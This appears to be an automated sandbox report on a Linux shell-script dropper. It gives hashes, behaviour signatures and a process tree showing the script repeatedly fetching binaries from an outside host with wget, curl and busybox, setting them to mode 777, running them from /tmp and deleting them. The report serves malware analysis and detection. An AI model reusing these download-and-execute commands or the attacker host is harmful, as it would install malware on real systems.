Analysis
max time kernel: 77s
max time network: 79s
platform: debian-9_mipsel
resource: debian9-mipsel-20240418-en
resource tags: arch:mipsel, image:debian9-mipsel-20240418-en, kernel:4.9.0-13-4kc-malta, locale:en-us, os:debian-9-mipsel, system
submitted: 24/11/2024, 02:03

Static task: static1

Behavioral task: behavioral1
Sample: 1861a8f25876de90f216fb5e90bd6048469817d5f36eee135cec493751f14ca9.sh
Resource: ubuntu1804-amd64-20240508-en

Behavioral task: behavioral2
Sample: 1861a8f25876de90f216fb5e90bd6048469817d5f36eee135cec493751f14ca9.sh
Resource: debian9-armhf-20240611-en

Behavioral task: behavioral3
Sample: 1861a8f25876de90f216fb5e90bd6048469817d5f36eee135cec493751f14ca9.sh
Resource: debian9-mipsbe-20240611-en

Behavioral task: behavioral4
Sample: 1861a8f25876de90f216fb5e90bd6048469817d5f36eee135cec493751f14ca9.sh
Resource: debian9-mipsel-20240418-en

General
Target: 1861a8f25876de90f216fb5e90bd6048469817d5f36eee135cec493751f14ca9.sh
Size: 10KB
MD5: b3326e86c6435c58119faa00fd7de1c3
SHA1: 706ae71f350916adfb672b819c6cca8e1ab5fdc5
SHA256: 1861a8f25876de90f216fb5e90bd6048469817d5f36eee135cec493751f14ca9
SHA512: e6eeba93a0d3074d2942fa787cb23d5458e0ead7df8bf5597fd29134ad3ebe1b1e194f62c0117c29e98527b067eea7ae78a44ac9fc7302ef04b873e7585362aa
SSDEEP: 192:o2tYFkg5W+fWyW5cE9JxKDXgGyW5cEHJxKDXsWkg5W+l:o2tYLo
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
Executes dropped EXE 28 IoCs
Reads runtime system information 28 IoCs
description ioc Process
File opened for reading /proc/sys/crypto/fips_enabled curl (the same entry is reported 28 times, once per curl invocation)
System Network Configuration Discovery 1 TTPs 64 IoCs
Adversaries may gather information about the network configuration of a system.
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
Processes
Columns: PID, image, command line, [signatures]. Indented entries are children (depth 2) of the sample's shell process (depth 1).

PID 710   /tmp/1861a8f25876de90f216fb5e90bd6048469817d5f36eee135cec493751f14ca9.sh   /tmp/1861a8f25876de90f216fb5e90bd6048469817d5f36eee135cec493751f14ca9.sh
  PID 715   /bin/rm   /bin/rm bins.sh
  PID 719   /usr/bin/wget   wget http://conn.masjesu.zip/bins/R7SUocTyfmAtSoNSJxV4J0igaSwBfldTA1   [System Network Configuration Discovery]
  PID 730   /usr/bin/curl   curl -O http://conn.masjesu.zip/bins/R7SUocTyfmAtSoNSJxV4J0igaSwBfldTA1   [Reads runtime system information; System Network Configuration Discovery; Writes file to tmp directory]
  PID 737   /bin/busybox   /bin/busybox wget http://conn.masjesu.zip/bins/R7SUocTyfmAtSoNSJxV4J0igaSwBfldTA1
  PID 740   /bin/chmod   chmod 777 R7SUocTyfmAtSoNSJxV4J0igaSwBfldTA1   [File and Directory Permissions Modification]
  PID 741   /tmp/R7SUocTyfmAtSoNSJxV4J0igaSwBfldTA1   ./R7SUocTyfmAtSoNSJxV4J0igaSwBfldTA1   [Executes dropped EXE]
  PID 742   /bin/rm   rm R7SUocTyfmAtSoNSJxV4J0igaSwBfldTA1
  PID 743   /usr/bin/wget   wget http://conn.masjesu.zip/bins/GwXaZ8PWWkRlAxfxD7EeCxUUaFBLDRtOSs   [System Network Configuration Discovery]
  PID 744   /usr/bin/curl   curl -O http://conn.masjesu.zip/bins/GwXaZ8PWWkRlAxfxD7EeCxUUaFBLDRtOSs   [Reads runtime system information; System Network Configuration Discovery; Writes file to tmp directory]
  PID 786   /bin/busybox   /bin/busybox wget http://conn.masjesu.zip/bins/GwXaZ8PWWkRlAxfxD7EeCxUUaFBLDRtOSs
  PID 792   /bin/chmod   chmod 777 GwXaZ8PWWkRlAxfxD7EeCxUUaFBLDRtOSs   [File and Directory Permissions Modification]
  PID 793   /tmp/GwXaZ8PWWkRlAxfxD7EeCxUUaFBLDRtOSs   ./GwXaZ8PWWkRlAxfxD7EeCxUUaFBLDRtOSs   [Executes dropped EXE]
  PID 794   /bin/rm   rm GwXaZ8PWWkRlAxfxD7EeCxUUaFBLDRtOSs
  PID 795   /usr/bin/wget   wget http://conn.masjesu.zip/bins/dtckiLNHMmMIgyeF2ZmUqqBaqC89XdtNd8   [System Network Configuration Discovery]
  PID 796   /usr/bin/curl   curl -O http://conn.masjesu.zip/bins/dtckiLNHMmMIgyeF2ZmUqqBaqC89XdtNd8   [Reads runtime system information; System Network Configuration Discovery; Writes file to tmp directory]
  PID 798   /bin/busybox   /bin/busybox wget http://conn.masjesu.zip/bins/dtckiLNHMmMIgyeF2ZmUqqBaqC89XdtNd8   [System Network Configuration Discovery]
  PID 799   /bin/chmod   chmod 777 dtckiLNHMmMIgyeF2ZmUqqBaqC89XdtNd8   [File and Directory Permissions Modification]
  PID 800   /tmp/dtckiLNHMmMIgyeF2ZmUqqBaqC89XdtNd8   ./dtckiLNHMmMIgyeF2ZmUqqBaqC89XdtNd8   [Executes dropped EXE]
  PID 801   /bin/rm   rm dtckiLNHMmMIgyeF2ZmUqqBaqC89XdtNd8
  PID 802   /usr/bin/wget   wget http://conn.masjesu.zip/bins/RFE4eEFRDNymb036q8IndKW8cykv3OBA8s
  PID 807   /usr/bin/curl   curl -O http://conn.masjesu.zip/bins/RFE4eEFRDNymb036q8IndKW8cykv3OBA8s   [Reads runtime system information; System Network Configuration Discovery; Writes file to tmp directory]
  PID 815   /bin/busybox   /bin/busybox wget http://conn.masjesu.zip/bins/RFE4eEFRDNymb036q8IndKW8cykv3OBA8s   [System Network Configuration Discovery]
  PID 819   /bin/chmod   chmod 777 RFE4eEFRDNymb036q8IndKW8cykv3OBA8s   [File and Directory Permissions Modification]
  PID 821   /tmp/RFE4eEFRDNymb036q8IndKW8cykv3OBA8s   ./RFE4eEFRDNymb036q8IndKW8cykv3OBA8s   [Executes dropped EXE]
  PID 824   /bin/rm   rm RFE4eEFRDNymb036q8IndKW8cykv3OBA8s
  PID 825   /usr/bin/wget   wget http://conn.masjesu.zip/bins/g4DsgH63Xo941w62ysNliiPUwEcC8WQq1T
  PID 832   /usr/bin/curl   curl -O http://conn.masjesu.zip/bins/g4DsgH63Xo941w62ysNliiPUwEcC8WQq1T   [Reads runtime system information; Writes file to tmp directory]
  PID 842   /bin/busybox   /bin/busybox wget http://conn.masjesu.zip/bins/g4DsgH63Xo941w62ysNliiPUwEcC8WQq1T   [System Network Configuration Discovery]
  PID 843   /bin/chmod   chmod 777 g4DsgH63Xo941w62ysNliiPUwEcC8WQq1T   [File and Directory Permissions Modification]
  PID 844   /tmp/g4DsgH63Xo941w62ysNliiPUwEcC8WQq1T   ./g4DsgH63Xo941w62ysNliiPUwEcC8WQq1T   [Executes dropped EXE; System Network Configuration Discovery]
  PID 845   /bin/rm   rm g4DsgH63Xo941w62ysNliiPUwEcC8WQq1T   [System Network Configuration Discovery]
  PID 846   /usr/bin/wget   wget http://conn.masjesu.zip/bins/JeJKFU6sQ1sqVpgPorqDvu45NrzY5yUz0z
  PID 847   /usr/bin/curl   curl -O http://conn.masjesu.zip/bins/JeJKFU6sQ1sqVpgPorqDvu45NrzY5yUz0z   [Reads runtime system information; System Network Configuration Discovery; Writes file to tmp directory]
  PID 849   /bin/busybox   /bin/busybox wget http://conn.masjesu.zip/bins/JeJKFU6sQ1sqVpgPorqDvu45NrzY5yUz0z
  PID 850   /bin/chmod   chmod 777 JeJKFU6sQ1sqVpgPorqDvu45NrzY5yUz0z   [File and Directory Permissions Modification]
  PID 851   /tmp/JeJKFU6sQ1sqVpgPorqDvu45NrzY5yUz0z   ./JeJKFU6sQ1sqVpgPorqDvu45NrzY5yUz0z   [Executes dropped EXE]
  PID 852   /bin/rm   rm JeJKFU6sQ1sqVpgPorqDvu45NrzY5yUz0z
  PID 853   /usr/bin/wget   wget http://conn.masjesu.zip/bins/Tb2H1mGYdMG3CvHiM9VCnX8b3JyQ2olePF   [System Network Configuration Discovery]
  PID 854   /usr/bin/curl   curl -O http://conn.masjesu.zip/bins/Tb2H1mGYdMG3CvHiM9VCnX8b3JyQ2olePF   [Reads runtime system information; System Network Configuration Discovery; Writes file to tmp directory]
  PID 856   /bin/busybox   /bin/busybox wget http://conn.masjesu.zip/bins/Tb2H1mGYdMG3CvHiM9VCnX8b3JyQ2olePF
  PID 857   /bin/chmod   chmod 777 Tb2H1mGYdMG3CvHiM9VCnX8b3JyQ2olePF   [File and Directory Permissions Modification]
  PID 858   /tmp/Tb2H1mGYdMG3CvHiM9VCnX8b3JyQ2olePF   ./Tb2H1mGYdMG3CvHiM9VCnX8b3JyQ2olePF   [Executes dropped EXE]
  PID 859   /bin/rm   rm Tb2H1mGYdMG3CvHiM9VCnX8b3JyQ2olePF
  PID 860   /usr/bin/wget   wget http://conn.masjesu.zip/bins/tlWMRu1LwlRsgGVm4x5v7mXSGGeySgB04j   [System Network Configuration Discovery]
  PID 861   /usr/bin/curl   curl -O http://conn.masjesu.zip/bins/tlWMRu1LwlRsgGVm4x5v7mXSGGeySgB04j   [Reads runtime system information; System Network Configuration Discovery; Writes file to tmp directory]
  PID 863   /bin/busybox   /bin/busybox wget http://conn.masjesu.zip/bins/tlWMRu1LwlRsgGVm4x5v7mXSGGeySgB04j   [System Network Configuration Discovery]
  PID 864   /bin/chmod   chmod 777 tlWMRu1LwlRsgGVm4x5v7mXSGGeySgB04j   [File and Directory Permissions Modification]
  PID 865   /tmp/tlWMRu1LwlRsgGVm4x5v7mXSGGeySgB04j   ./tlWMRu1LwlRsgGVm4x5v7mXSGGeySgB04j   [Executes dropped EXE]
  PID 866   /bin/rm   rm tlWMRu1LwlRsgGVm4x5v7mXSGGeySgB04j
  PID 867   /usr/bin/wget   wget http://conn.masjesu.zip/bins/M7cVVwmreIcKCaNo2W9c27VaM4JQtzslYV   [System Network Configuration Discovery]
  PID 868   /usr/bin/curl   curl -O http://conn.masjesu.zip/bins/M7cVVwmreIcKCaNo2W9c27VaM4JQtzslYV   [Reads runtime system information; Writes file to tmp directory]
  PID 873   /bin/busybox   /bin/busybox wget http://conn.masjesu.zip/bins/M7cVVwmreIcKCaNo2W9c27VaM4JQtzslYV   [System Network Configuration Discovery]
  PID 874   /bin/chmod   chmod 777 M7cVVwmreIcKCaNo2W9c27VaM4JQtzslYV   [File and Directory Permissions Modification]
  PID 875   /tmp/M7cVVwmreIcKCaNo2W9c27VaM4JQtzslYV   ./M7cVVwmreIcKCaNo2W9c27VaM4JQtzslYV   [Executes dropped EXE]
  PID 876   /bin/rm   rm M7cVVwmreIcKCaNo2W9c27VaM4JQtzslYV
  PID 877   /usr/bin/wget   wget http://conn.masjesu.zip/bins/3mXX9H7SKLs0SyA1KvEuX8QqyBBp46HRVH   [System Network Configuration Discovery]
  PID 878   /usr/bin/curl   curl -O http://conn.masjesu.zip/bins/3mXX9H7SKLs0SyA1KvEuX8QqyBBp46HRVH   [Reads runtime system information; System Network Configuration Discovery; Writes file to tmp directory]
  PID 880   /bin/busybox   /bin/busybox wget http://conn.masjesu.zip/bins/3mXX9H7SKLs0SyA1KvEuX8QqyBBp46HRVH   [System Network Configuration Discovery]
  PID 881   /bin/chmod   chmod 777 3mXX9H7SKLs0SyA1KvEuX8QqyBBp46HRVH   [File and Directory Permissions Modification]
  PID 882   /tmp/3mXX9H7SKLs0SyA1KvEuX8QqyBBp46HRVH   ./3mXX9H7SKLs0SyA1KvEuX8QqyBBp46HRVH   [Executes dropped EXE]
  PID 883   /bin/rm   rm 3mXX9H7SKLs0SyA1KvEuX8QqyBBp46HRVH
  PID 884   /usr/bin/wget   wget http://conn.masjesu.zip/bins/Slf2XiBoIHc7ifkK2WbqAMjvGmbpqZ2mpj   [System Network Configuration Discovery]
  PID 885   /usr/bin/curl   curl -O http://conn.masjesu.zip/bins/Slf2XiBoIHc7ifkK2WbqAMjvGmbpqZ2mpj   [Reads runtime system information; System Network Configuration Discovery; Writes file to tmp directory]
  PID 887   /bin/busybox   /bin/busybox wget http://conn.masjesu.zip/bins/Slf2XiBoIHc7ifkK2WbqAMjvGmbpqZ2mpj
  PID 888   /bin/chmod   chmod 777 Slf2XiBoIHc7ifkK2WbqAMjvGmbpqZ2mpj   [File and Directory Permissions Modification]
  PID 889   /tmp/Slf2XiBoIHc7ifkK2WbqAMjvGmbpqZ2mpj   ./Slf2XiBoIHc7ifkK2WbqAMjvGmbpqZ2mpj   [Executes dropped EXE]
  PID 890   /bin/rm   rm Slf2XiBoIHc7ifkK2WbqAMjvGmbpqZ2mpj
  PID 891   /usr/bin/wget   wget http://conn.masjesu.zip/bins/nRshT0bdSH5JB1uNi2H0zJwOLcHvGx6zgU
  PID 892   /usr/bin/curl   curl -O http://conn.masjesu.zip/bins/nRshT0bdSH5JB1uNi2H0zJwOLcHvGx6zgU   [Reads runtime system information; System Network Configuration Discovery; Writes file to tmp directory]
  PID 894   /bin/busybox   /bin/busybox wget http://conn.masjesu.zip/bins/nRshT0bdSH5JB1uNi2H0zJwOLcHvGx6zgU   [System Network Configuration Discovery]
  PID 895   /bin/chmod   chmod 777 nRshT0bdSH5JB1uNi2H0zJwOLcHvGx6zgU   [File and Directory Permissions Modification]
  PID 896   /tmp/nRshT0bdSH5JB1uNi2H0zJwOLcHvGx6zgU   ./nRshT0bdSH5JB1uNi2H0zJwOLcHvGx6zgU   [Executes dropped EXE]
  PID 897   /bin/rm   rm nRshT0bdSH5JB1uNi2H0zJwOLcHvGx6zgU
  PID 898   /usr/bin/wget   wget http://conn.masjesu.zip/bins/BIRBlyyAMtQeqqtCuQkNPGmFkeGdu1Aapr   [System Network Configuration Discovery]
  PID 899   /usr/bin/curl   curl -O http://conn.masjesu.zip/bins/BIRBlyyAMtQeqqtCuQkNPGmFkeGdu1Aapr   [Reads runtime system information; System Network Configuration Discovery; Writes file to tmp directory]
  PID 901   /bin/busybox   /bin/busybox wget http://conn.masjesu.zip/bins/BIRBlyyAMtQeqqtCuQkNPGmFkeGdu1Aapr
  PID 902   /bin/chmod   chmod 777 BIRBlyyAMtQeqqtCuQkNPGmFkeGdu1Aapr   [File and Directory Permissions Modification]
  PID 903   /tmp/BIRBlyyAMtQeqqtCuQkNPGmFkeGdu1Aapr   ./BIRBlyyAMtQeqqtCuQkNPGmFkeGdu1Aapr   [Executes dropped EXE]
  PID 904   /bin/rm   rm BIRBlyyAMtQeqqtCuQkNPGmFkeGdu1Aapr
  PID 905   /usr/bin/wget   wget http://conn.masjesu.zip/bins/1tGliuUb9KSmHUMBb5C3c9gquHrVMvilya   [System Network Configuration Discovery]
  PID 906   /usr/bin/curl   curl -O http://conn.masjesu.zip/bins/1tGliuUb9KSmHUMBb5C3c9gquHrVMvilya   [Reads runtime system information; System Network Configuration Discovery; Writes file to tmp directory]
  PID 908   /bin/busybox   /bin/busybox wget http://conn.masjesu.zip/bins/1tGliuUb9KSmHUMBb5C3c9gquHrVMvilya   [System Network Configuration Discovery]
  PID 909   /bin/chmod   chmod 777 1tGliuUb9KSmHUMBb5C3c9gquHrVMvilya   [File and Directory Permissions Modification]
  PID 910   /tmp/1tGliuUb9KSmHUMBb5C3c9gquHrVMvilya   ./1tGliuUb9KSmHUMBb5C3c9gquHrVMvilya   [Executes dropped EXE]
  PID 911   /bin/rm   rm 1tGliuUb9KSmHUMBb5C3c9gquHrVMvilya
  PID 912   /usr/bin/wget   wget http://conn.masjesu.zip/bins/M7cVVwmreIcKCaNo2W9c27VaM4JQtzslYV   [System Network Configuration Discovery]
  PID 913   /usr/bin/curl   curl -O http://conn.masjesu.zip/bins/M7cVVwmreIcKCaNo2W9c27VaM4JQtzslYV   [Reads runtime system information; System Network Configuration Discovery; Writes file to tmp directory]
  PID 915   /bin/busybox   /bin/busybox wget http://conn.masjesu.zip/bins/M7cVVwmreIcKCaNo2W9c27VaM4JQtzslYV   [System Network Configuration Discovery]
  PID 916   /bin/chmod   chmod 777 M7cVVwmreIcKCaNo2W9c27VaM4JQtzslYV   [File and Directory Permissions Modification]
  PID 917   /tmp/M7cVVwmreIcKCaNo2W9c27VaM4JQtzslYV   ./M7cVVwmreIcKCaNo2W9c27VaM4JQtzslYV   [Executes dropped EXE]
  PID 918   /bin/rm   rm M7cVVwmreIcKCaNo2W9c27VaM4JQtzslYV
  PID 919   /usr/bin/wget   wget http://conn.masjesu.zip/bins/3mXX9H7SKLs0SyA1KvEuX8QqyBBp46HRVH   [System Network Configuration Discovery]
  PID 920   /usr/bin/curl   curl -O http://conn.masjesu.zip/bins/3mXX9H7SKLs0SyA1KvEuX8QqyBBp46HRVH   [Reads runtime system information; System Network Configuration Discovery; Writes file to tmp directory]
  PID 922   /bin/busybox   /bin/busybox wget http://conn.masjesu.zip/bins/3mXX9H7SKLs0SyA1KvEuX8QqyBBp46HRVH   [System Network Configuration Discovery]
  PID 923   /bin/chmod   chmod 777 3mXX9H7SKLs0SyA1KvEuX8QqyBBp46HRVH   [File and Directory Permissions Modification]
  PID 924   /tmp/3mXX9H7SKLs0SyA1KvEuX8QqyBBp46HRVH   ./3mXX9H7SKLs0SyA1KvEuX8QqyBBp46HRVH   [Executes dropped EXE]
  PID 925   /bin/rm   rm 3mXX9H7SKLs0SyA1KvEuX8QqyBBp46HRVH
  PID 926   /usr/bin/wget   wget http://conn.masjesu.zip/bins/Slf2XiBoIHc7ifkK2WbqAMjvGmbpqZ2mpj
  PID 927   /usr/bin/curl   curl -O http://conn.masjesu.zip/bins/Slf2XiBoIHc7ifkK2WbqAMjvGmbpqZ2mpj   [Reads runtime system information; System Network Configuration Discovery; Writes file to tmp directory]
  PID 929   /bin/busybox   /bin/busybox wget http://conn.masjesu.zip/bins/Slf2XiBoIHc7ifkK2WbqAMjvGmbpqZ2mpj   [System Network Configuration Discovery]
  PID 930   /bin/chmod   chmod 777 Slf2XiBoIHc7ifkK2WbqAMjvGmbpqZ2mpj   [File and Directory Permissions Modification]
  PID 931   /tmp/Slf2XiBoIHc7ifkK2WbqAMjvGmbpqZ2mpj   ./Slf2XiBoIHc7ifkK2WbqAMjvGmbpqZ2mpj   [Executes dropped EXE]
  PID 932   /bin/rm   rm Slf2XiBoIHc7ifkK2WbqAMjvGmbpqZ2mpj
  PID 933   /usr/bin/wget   wget http://conn.masjesu.zip/bins/nRshT0bdSH5JB1uNi2H0zJwOLcHvGx6zgU   [System Network Configuration Discovery]
  PID 934   /usr/bin/curl   curl -O http://conn.masjesu.zip/bins/nRshT0bdSH5JB1uNi2H0zJwOLcHvGx6zgU   [Reads runtime system information; Writes file to tmp directory]
  PID 936   /bin/busybox   /bin/busybox wget http://conn.masjesu.zip/bins/nRshT0bdSH5JB1uNi2H0zJwOLcHvGx6zgU
  PID 937   /bin/chmod   chmod 777 nRshT0bdSH5JB1uNi2H0zJwOLcHvGx6zgU   [File and Directory Permissions Modification]
  PID 938   /tmp/nRshT0bdSH5JB1uNi2H0zJwOLcHvGx6zgU   ./nRshT0bdSH5JB1uNi2H0zJwOLcHvGx6zgU   [Executes dropped EXE]
  PID 939   /bin/rm   rm nRshT0bdSH5JB1uNi2H0zJwOLcHvGx6zgU
  PID 940   /usr/bin/wget   wget http://conn.masjesu.zip/bins/BIRBlyyAMtQeqqtCuQkNPGmFkeGdu1Aapr   [System Network Configuration Discovery]
  PID 941   /usr/bin/curl   curl -O http://conn.masjesu.zip/bins/BIRBlyyAMtQeqqtCuQkNPGmFkeGdu1Aapr   [Reads runtime system information; System Network Configuration Discovery; Writes file to tmp directory]
  PID 943   /bin/busybox   /bin/busybox wget http://conn.masjesu.zip/bins/BIRBlyyAMtQeqqtCuQkNPGmFkeGdu1Aapr   [System Network Configuration Discovery]
  PID 944   /bin/chmod   chmod 777 BIRBlyyAMtQeqqtCuQkNPGmFkeGdu1Aapr   [File and Directory Permissions Modification]
  PID 945   /tmp/BIRBlyyAMtQeqqtCuQkNPGmFkeGdu1Aapr   ./BIRBlyyAMtQeqqtCuQkNPGmFkeGdu1Aapr   [Executes dropped EXE]
  PID 946   /bin/rm   rm BIRBlyyAMtQeqqtCuQkNPGmFkeGdu1Aapr
  PID 947   /usr/bin/wget   wget http://conn.masjesu.zip/bins/1tGliuUb9KSmHUMBb5C3c9gquHrVMvilya
  PID 948   /usr/bin/curl   curl -O http://conn.masjesu.zip/bins/1tGliuUb9KSmHUMBb5C3c9gquHrVMvilya   [Reads runtime system information; System Network Configuration Discovery; Writes file to tmp directory]
  PID 950   /bin/busybox   /bin/busybox wget http://conn.masjesu.zip/bins/1tGliuUb9KSmHUMBb5C3c9gquHrVMvilya
  PID 951   /bin/chmod   chmod 777 1tGliuUb9KSmHUMBb5C3c9gquHrVMvilya   [File and Directory Permissions Modification]
  PID 952   /tmp/1tGliuUb9KSmHUMBb5C3c9gquHrVMvilya   ./1tGliuUb9KSmHUMBb5C3c9gquHrVMvilya   [Executes dropped EXE]
  PID 953   /bin/rm   rm 1tGliuUb9KSmHUMBb5C3c9gquHrVMvilya
  PID 954   /usr/bin/wget   wget http://conn.masjesu.zip/bins/dtckiLNHMmMIgyeF2ZmUqqBaqC89XdtNd8   [System Network Configuration Discovery]
  PID 955   /usr/bin/curl   curl -O http://conn.masjesu.zip/bins/dtckiLNHMmMIgyeF2ZmUqqBaqC89XdtNd8   [Reads runtime system information; Writes file to tmp directory]
  PID 957   /bin/busybox   /bin/busybox wget http://conn.masjesu.zip/bins/dtckiLNHMmMIgyeF2ZmUqqBaqC89XdtNd8
  PID 958   /bin/chmod   chmod 777 dtckiLNHMmMIgyeF2ZmUqqBaqC89XdtNd8   [File and Directory Permissions Modification]
  PID 959   /tmp/dtckiLNHMmMIgyeF2ZmUqqBaqC89XdtNd8   ./dtckiLNHMmMIgyeF2ZmUqqBaqC89XdtNd8   [Executes dropped EXE]
  PID 960   /bin/rm   rm dtckiLNHMmMIgyeF2ZmUqqBaqC89XdtNd8
  PID 961   /usr/bin/wget   wget http://conn.masjesu.zip/bins/RFE4eEFRDNymb036q8IndKW8cykv3OBA8s
  PID 962   /usr/bin/curl   curl -O http://conn.masjesu.zip/bins/RFE4eEFRDNymb036q8IndKW8cykv3OBA8s   [Reads runtime system information; System Network Configuration Discovery; Writes file to tmp directory]
  PID 964   /bin/busybox   /bin/busybox wget http://conn.masjesu.zip/bins/RFE4eEFRDNymb036q8IndKW8cykv3OBA8s   [System Network Configuration Discovery]
  PID 965   /bin/chmod   chmod 777 RFE4eEFRDNymb036q8IndKW8cykv3OBA8s   [File and Directory Permissions Modification]
  PID 966   /tmp/RFE4eEFRDNymb036q8IndKW8cykv3OBA8s   ./RFE4eEFRDNymb036q8IndKW8cykv3OBA8s   [Executes dropped EXE]
  PID 967   /bin/rm   rm RFE4eEFRDNymb036q8IndKW8cykv3OBA8s
  PID 968   /usr/bin/wget   wget http://conn.masjesu.zip/bins/g4DsgH63Xo941w62ysNliiPUwEcC8WQq1T   [System Network Configuration Discovery]
  PID 969   /usr/bin/curl   curl -O http://conn.masjesu.zip/bins/g4DsgH63Xo941w62ysNliiPUwEcC8WQq1T   [Reads runtime system information; Writes file to tmp directory]
  PID 971   /bin/busybox   /bin/busybox wget http://conn.masjesu.zip/bins/g4DsgH63Xo941w62ysNliiPUwEcC8WQq1T
  PID 972   /bin/chmod   chmod 777 g4DsgH63Xo941w62ysNliiPUwEcC8WQq1T   [File and Directory Permissions Modification]
  PID 973   /tmp/g4DsgH63Xo941w62ysNliiPUwEcC8WQq1T   ./g4DsgH63Xo941w62ysNliiPUwEcC8WQq1T   [Executes dropped EXE]
  PID 974   /bin/rm   rm g4DsgH63Xo941w62ysNliiPUwEcC8WQq1T   [System Network Configuration Discovery]
  PID 975   /usr/bin/wget   wget http://conn.masjesu.zip/bins/R7SUocTyfmAtSoNSJxV4J0igaSwBfldTA1   [System Network Configuration Discovery]
  PID 976   /usr/bin/curl   curl -O http://conn.masjesu.zip/bins/R7SUocTyfmAtSoNSJxV4J0igaSwBfldTA1   [Reads runtime system information; System Network Configuration Discovery; Writes file to tmp directory]
  PID 978   /bin/busybox   /bin/busybox wget http://conn.masjesu.zip/bins/R7SUocTyfmAtSoNSJxV4J0igaSwBfldTA1   [System Network Configuration Discovery]
  PID 979   /bin/chmod   chmod 777 R7SUocTyfmAtSoNSJxV4J0igaSwBfldTA1   [File and Directory Permissions Modification]
  PID 980   /tmp/R7SUocTyfmAtSoNSJxV4J0igaSwBfldTA1   ./R7SUocTyfmAtSoNSJxV4J0igaSwBfldTA1   [Executes dropped EXE]
  PID 981   /bin/rm   rm R7SUocTyfmAtSoNSJxV4J0igaSwBfldTA1
  PID 982   /usr/bin/wget   wget http://conn.masjesu.zip/bins/GwXaZ8PWWkRlAxfxD7EeCxUUaFBLDRtOSs   [System Network Configuration Discovery]
  PID 983   /usr/bin/curl   curl -O http://conn.masjesu.zip/bins/GwXaZ8PWWkRlAxfxD7EeCxUUaFBLDRtOSs   [Reads runtime system information; Writes file to tmp directory]
  PID 985   /bin/busybox   /bin/busybox wget http://conn.masjesu.zip/bins/GwXaZ8PWWkRlAxfxD7EeCxUUaFBLDRtOSs   [System Network Configuration Discovery]
  PID 986   /bin/chmod   chmod 777 GwXaZ8PWWkRlAxfxD7EeCxUUaFBLDRtOSs   [File and Directory Permissions Modification]
  PID 987   /tmp/GwXaZ8PWWkRlAxfxD7EeCxUUaFBLDRtOSs   ./GwXaZ8PWWkRlAxfxD7EeCxUUaFBLDRtOSs   [Executes dropped EXE]
  PID 988   /bin/rm   rm GwXaZ8PWWkRlAxfxD7EeCxUUaFBLDRtOSs
  PID 989   /usr/bin/wget   wget http://conn.masjesu.zip/bins/JeJKFU6sQ1sqVpgPorqDvu45NrzY5yUz0z   [System Network Configuration Discovery]
  PID 990   /usr/bin/curl   curl -O http://conn.masjesu.zip/bins/JeJKFU6sQ1sqVpgPorqDvu45NrzY5yUz0z   [Reads runtime system information; System Network Configuration Discovery; Writes file to tmp directory]
  PID 992   /bin/busybox   /bin/busybox wget http://conn.masjesu.zip/bins/JeJKFU6sQ1sqVpgPorqDvu45NrzY5yUz0z   [System Network Configuration Discovery]
  PID 993   /bin/chmod   chmod 777 JeJKFU6sQ1sqVpgPorqDvu45NrzY5yUz0z   [File and Directory Permissions Modification]
  PID 994   /tmp/JeJKFU6sQ1sqVpgPorqDvu45NrzY5yUz0z   ./JeJKFU6sQ1sqVpgPorqDvu45NrzY5yUz0z   [Executes dropped EXE]
  PID 995   /bin/rm   rm JeJKFU6sQ1sqVpgPorqDvu45NrzY5yUz0z
  PID 996   /usr/bin/wget   wget http://conn.masjesu.zip/bins/Tb2H1mGYdMG3CvHiM9VCnX8b3JyQ2olePF   [System Network Configuration Discovery]
  PID 997   /usr/bin/curl   curl -O http://conn.masjesu.zip/bins/Tb2H1mGYdMG3CvHiM9VCnX8b3JyQ2olePF   [Reads runtime system information; System Network Configuration Discovery; Writes file to tmp directory]
  PID 999   /bin/busybox   /bin/busybox wget http://conn.masjesu.zip/bins/Tb2H1mGYdMG3CvHiM9VCnX8b3JyQ2olePF   [System Network Configuration Discovery]
  PID 1000   /bin/chmod   chmod 777 Tb2H1mGYdMG3CvHiM9VCnX8b3JyQ2olePF   [File and Directory Permissions Modification]
  PID 1001   /tmp/Tb2H1mGYdMG3CvHiM9VCnX8b3JyQ2olePF   ./Tb2H1mGYdMG3CvHiM9VCnX8b3JyQ2olePF   [Executes dropped EXE]
  PID 1002   /bin/rm   rm Tb2H1mGYdMG3CvHiM9VCnX8b3JyQ2olePF
  PID 1003   /usr/bin/wget   wget http://conn.masjesu.zip/bins/tlWMRu1LwlRsgGVm4x5v7mXSGGeySgB04j   [System Network Configuration Discovery]
  PID 1004   /usr/bin/curl   curl -O http://conn.masjesu.zip/bins/tlWMRu1LwlRsgGVm4x5v7mXSGGeySgB04j   [Reads runtime system information; System Network Configuration Discovery; Writes file to tmp directory]
  PID 1006   /bin/busybox   /bin/busybox wget http://conn.masjesu.zip/bins/tlWMRu1LwlRsgGVm4x5v7mXSGGeySgB04j   [System Network Configuration Discovery]
  PID 1007   /bin/chmod   chmod 777 tlWMRu1LwlRsgGVm4x5v7mXSGGeySgB04j   [File and Directory Permissions Modification]
  PID 1008   /tmp/tlWMRu1LwlRsgGVm4x5v7mXSGGeySgB04j   ./tlWMRu1LwlRsgGVm4x5v7mXSGGeySgB04j   [Executes dropped EXE]
  PID 1009   /bin/rm   rm tlWMRu1LwlRsgGVm4x5v7mXSGGeySgB04j
Network
MITRE ATT&CK Enterprise v15
Downloads
Filesize: 153B
MD5: 998368d7c95ea4293237f2320546e440
SHA1: 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256: 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512: 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97